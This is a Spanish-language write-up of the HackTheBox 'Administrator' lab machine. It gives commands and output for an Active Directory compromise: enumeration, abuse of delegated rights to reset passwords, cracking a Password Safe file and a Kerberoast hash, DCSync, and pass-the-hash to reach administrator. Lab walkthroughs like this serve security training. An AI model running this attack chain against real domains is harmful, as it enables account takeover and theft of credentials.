# HackTheBox Administrator

```rust
❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.42 -oG port

PORT     STATE SERVICE          REASON
21/tcp   open  ftp              syn-ack ttl 127
53/tcp   open  domain           syn-ack ttl 127
88/tcp   open  kerberos-sec     syn-ack ttl 127
135/tcp  open  msrpc            syn-ack ttl 127
139/tcp  open  netbios-ssn      syn-ack ttl 127
389/tcp  open  ldap             syn-ack ttl 127
445/tcp  open  microsoft-ds     syn-ack ttl 127
464/tcp  open  kpasswd5         syn-ack ttl 127
593/tcp  open  http-rpc-epmap   syn-ack ttl 127
636/tcp  open  ldapssl          syn-ack ttl 127
3268/tcp open  globalcatLDAP    syn-ack ttl 127
3269/tcp open  globalcatLDAPssl syn-ack ttl 127

```

***

```python
❯ nmap -sCV -p21,53,88,135,139,389,445,464,593,636,3268,3269 10.10.11.42 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 16:43 EDT
Nmap scan report for 10.10.11.42
Host is up (0.037s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-25 19:47:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-25T19:47:23
|_  start_date: N/A
|_clock-skew: -55m49s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

Puertos abiertos con su version y servicio que corren.

***

```rust
❯ ldapsearch -x -H ldap://10.10.11.42 -s base | grep 'ServiceName'
ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
```

Verificamos el dominio y los agregamos al etc/hosts.

***

### nxc

```python
❯ nxc winrm 10.10.11.42 -u 'Olivia' -p 'ichliebedich'  2>/dev/null
WINRM       10.10.11.42     5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.10.11.42     5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)
```

> Este comando **verifica si las credenciales proporcionadas permiten autenticar** correctamente a través de **WinRM**, un protocolo que permite la administración remota de sistemas Windows.

***

```python
❯ evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.11.42
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2
*Evil-WinRM* PS C:\Users\olivia\Documents> 

```

Nos conectamos y estamos dentro.

***

```python
❯ nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --users 2>/dev/null
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\Olivia:ichliebedich 
SMB         10.10.11.42     445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-                                   
SMB         10.10.11.42     445    DC               Administrator                 2024-10-22 18:59:36 0       Built-in account for administering the computer/domain
SMB         10.10.11.42     445    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.42     445    DC               krbtgt                        2024-10-04 19:53:28 0       Key Distribution Center Service Account 
SMB         10.10.11.42     445    DC               olivia                        2024-10-06 01:22:48 0        
SMB         10.10.11.42     445    DC               michael                       2025-04-24 01:58:57 0        
SMB         10.10.11.42     445    DC               benjamin                      2025-04-24 02:02:27 0        
SMB         10.10.11.42     445    DC               emily                         2024-10-30 23:40:02 0        
SMB         10.10.11.42     445    DC               ethan                         2024-10-12 20:52:14 0        
SMB         10.10.11.42     445    DC               alexander                     2024-10-31 00:18:04 0        
SMB         10.10.11.42     445    DC               emma                          2024-10-31 00:18:35 0        
SMB         10.10.11.42     445    DC               [*] Enumerated 10 local users: ADMINISTRATOR
```

Con este comando estámos preguntando al servidor SMB: **Con este usuario y contraseña, ¿me puedes decir qué usuarios hay en el sistema?"**

***

## ldapdomaindump

```rust
❯ ldapdomaindump -u 'administrator.htb\Olivia' -p 'ichliebedich' 10.10.11.42 -o ldap
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
❯ ll
drwxrwxr-x root root 4.0 KB Sat Apr 26 14:20:11 2025  ldap

❯ python3 -m http.server
```

Dumpeamos el DC para ir haciendonos una idea de todo y nos compartimos un servidor con python3 para verlo.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2Fy1xyOAZtgjgOScrAeIDZ%2F4.png?alt=media&#x26;token=01c89143-9980-476f-a1fc-ca6fab95fdf9" alt=""><figcaption></figcaption></figure>

> Tenemos los usuarios del sistema que ya teniamos cuando los enumeramos con nxc y mas abajo observamos los Remote Management Users, usuarios que se pueden conectar remotamente al DC.

***

```rust
❯ bloodhound-python -u 'olivia' -p 'ichliebedich' -c All --zip -ns 10.10.11.42 -d administrator.htb
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250426004656_bloodhound.zip
```

Este comando usa la herramienta `bloodhound-python`, que sirve para **recolectar información de Active Directory (AD)** con el fin de analizarla visualmente después en la herramienta BloodHound.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FFAHyLBFQVVD8D4vvr2Tv%2F1.png?alt=media&#x26;token=7b25b613-75c1-4e6b-9a70-78a178320107" alt=""><figcaption></figcaption></figure>

Actualmente somos olivia, y observamos que olivia tiene derecho Generic All sobre el usuario Michael.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FgiqcKn5KoXMNbFdVFzZK%2F2.png?alt=media&#x26;token=6c3f71e7-4586-42d5-8dcb-2ffd99dae915" alt=""><figcaption></figcaption></figure>

> ```rust
> ❯ net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"olivia"%"ichliebedich" -S "10.10.11.42"
> ```
>
> “Hola, soy `olivia`, tengo permisos. Quiero cambiar la contraseña del usuario `michael` a `newP@ssword2022`.”

🔐 Como `olivia` tiene privilegios suficientes (por ejemplo, es admin del dominio o tiene permisos de delegación), el cambio de contraseña se realiza sin problema.

***

```python
❯ evil-winrm -i 10.10.11.42 -u 'michael' -p 'newP@ssword2022'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael
*Evil-WinRM* PS C:\Users\michael\Documents> 

```

Observamos que nos podemos conectar como michael le hemos cambiado la contraseña.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FcafHKHlIlAo90eHaVNnN%2F3.png?alt=media&#x26;token=6e8f2e68-68b2-4b02-8455-ba87bd3839a1" alt=""><figcaption></figcaption></figure>

Ahora que ya tenemos credenciales validas para el usuario michael, observamos que michael tiene permisos de ForceChangePassword sobre Benjami, en español le podemos cambiar la contraseña al usario benjami.

```rust
❯ net rpc password "benjamin" "newP@ssword2022" -U "administrator.htb"/"michael"%"newP@ssword2022" -S "10.10.11.42"
```

Le cambiamos la contraseña al usuario benjamin.

***

## FTP

```python
❯ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||51408|)
125 Data connection already open; Transfer starting.
10-05-24  09:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51411|)
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************************************|   952       25.95 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (25.73 KiB/s)
ftp> 

```

> Ahora con las credenciales del usuario benjamin nos conectamos por FTP y nos descargamos, lo que encontramos por aca.
>
> Nos conectamos por FTP porque este usuario no pertenece al Remote Management Users

***

## John&#x20;

```rust
❯ pwsafe2john Backup.psafe3 > hash

❯ john -w:/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2025-04-26 14:43) 3.448g/s 21186p/s 21186c/s 21186C/s newzealand..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

```

Obtenemos una contraseña.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2F2fC9seJZZkn2zqsY0YjP%2F5.png?alt=media&#x26;token=61f93b94-f0d8-42ab-b1f0-af6edb3f21c9" alt=""><figcaption></figcaption></figure>

Procedemos a observar el contenido con la conntraseña crackeada.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FcJVsZJ7ND3BB6hLjmuy7%2F6.png?alt=media&#x26;token=2cb4612e-074e-4006-bc18-1dc820d52b27" alt=""><figcaption></figcaption></figure>

> Obtenemos la contraseña para el Usuario Emily hay que recordar que ella forma parte del Remote Management Users es decir nos podemos conectar usando evil.

```rust
❯ evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVtj8yQFKoHjXmb'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> cd ..//Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> more user.txt
93ced29a839897ff6fbe6c1fe7d0df4c

*Evil-WinRM* PS C:\Users\emily\Desktop> 


```

> Nos conectamos y tenemos la primera bandera.

***

### Privilege Escalation <a href="#privilege-escalation" id="privilege-escalation"></a>

Se identificó que la cuenta **Emily** tenía el permiso **GenericWrite** sobre la cuenta **Ethan**, lo que permitía modificar atributos como **`servicePrincipalName (SPN)`**. Aprovechando esto, se utilizó **TargetedKerberoast** para asignar temporalmente un SPN ficticio a la cuenta **Ethan**.

Luego, se solicitó un **TGS (Ticket Granting Service)** al DC, obteniendo un **hash cifrado** asociado al servicio. Finalmente, el SPN asignado fue eliminado para evitar dejar evidencias.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FveAsA6OIfPNmlCHTztVj%2F7.png?alt=media&#x26;token=5b33ad6e-8096-461a-80e0-7f2f5a3b0731" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/ShutdownRepo/targetedKerberoast>" %}

> ❯ pip3 install -r requirements.txt --break-system-packages

***

```rust
❯ ntpdate 10.10.11.42 | python3 targetedKerberoast.py -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -d administrator.htb --dc-ip 10.10.11.42
```

> Primero sincronizamos la hora con el servidor para evitar errores de autenticación, y luego lanzan un ataque **Kerberoast** contra el usuario `emily` en el dominio `administrator.htb`, usando su contraseña conocida, apuntando al servidor `10.10.11.42`.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FWaSOppqXSgFLkRQwPC66%2F8.png?alt=media&#x26;token=d0d6b78d-2759-4f8a-b675-e68cb50cd089" alt=""><figcaption></figcaption></figure>

```python
❯ john -w:/usr/share/wordlists/rockyou.txt EthanHash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2025-04-26 14:54) 100.0g/s 512000p/s 512000c/s 512000C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

Crackeamos el hash  para el usuario Ethan y ahora tenemos la contraseña del usuario Ethan.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FfVnW33qXhKJhZefZufH1%2F10.png?alt=media&#x26;token=a6d9b20f-1cf0-4613-bc10-e23ce57a93ba" alt=""><figcaption></figcaption></figure>

> Al revisar nuevamente en **BloodHound**, se verificó que el usuario **<ethan@administrator.htb>** dispone de privilegios **DCSync**, lo que nos permite llevar a cabo un **DCSync Attack**. Esto nos da la posibilidad de obtener todos los hashes **NTLM** del archivo **NTDS.dit**, que es la base de datos de **Active Directory** y almacena las contraseñas de todos los usuarios del dominio.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FqhQcTeJnT3ikWa6zpFET%2F11.png?alt=media&#x26;token=b46b97c1-a150-414a-afc2-ffd34dfaeb07" alt=""><figcaption></figcaption></figure>

Verficaremos que el hash NTLM es válido y procederemos a conectarnos a través de **evil-winrm** con el usuario **<administrator@administrator.htb>** y verificar la flag de **root.txt**.

***

```rust
❯ evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd10bd016e098d2d2fd2e'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..//Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
49b12488f6763c3033dd93bf2d9fc4c4

*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

```

Nos conectamos y maquina resuelta somos administrador.